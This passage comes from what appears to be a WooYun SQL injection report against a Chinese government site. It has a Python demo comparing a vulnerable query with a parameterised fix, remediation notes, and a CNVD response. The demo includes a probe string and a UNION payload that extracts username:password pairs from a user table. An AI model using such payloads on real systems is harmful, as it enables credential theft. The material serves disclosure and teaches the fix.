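    return [row[0] for row in con.execute(sql)]

def show_fixed(con, id_param):
    """Parameterised: the value is bound, never parsed, so quotes, semicolons
    or UNION inside it are data that simply matches no row."""
    sql = "SELECT title FROM qygk_lb WHERE id=?"
    return [row[0] for row in con.execute(sql, (id_param,))]

def outcome(fn, con, value):
    """Result rows, or the string 'error' when the DBMS rejects the statement."""
    try:
        return fn(con, value)
    except sqlite3.OperationalError:
        return "error"

# The report's probe, and a generic UNION tail standing in for its error-based
# extraction; it shows why plaintext passwords in qygk_User are one query away
# once any parameter is injectable.
PROBE = "288'"
DUMP = "x' UNION SELECT username || ':' || password FROM qygk_User --"

def demo():
    con = make_db()
    return {
        "vulnerable_normal": outcome(show_vulnerable, con, "288"),
        "vulnerable_probe": outcome(show_vulnerable, con, PROBE),
        "vulnerable_dump": outcome(show_vulnerable, con, DUMP),
        "fixed_probe": outcome(show_fixed, con, PROBE),
        "fixed_dump": outcome(show_fixed, con, DUMP),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Two caveats the output above supports. Filtering by expected format is fragile here: the GUID-shaped id in injection point three and the LIKE '%...%' context in injection point five were both injectable, so the safe boundary is the statement, not the parameter's apparent type. And "current user is DBA: True" with stacked queries means each injection point reaches all seven listed databases, not just zwdt; moving the web login to a least-privilege database user belongs in the fix alongside parameterisation.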

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-11-27 13:40

Vendor reply:

CNVD did not directly reproduce the described situation. A notification was compiled from the reporter's description and forwarded through CNCERT to the Jilin branch center, which will coordinate handling with the website's operating unit.

Latest status:

None yet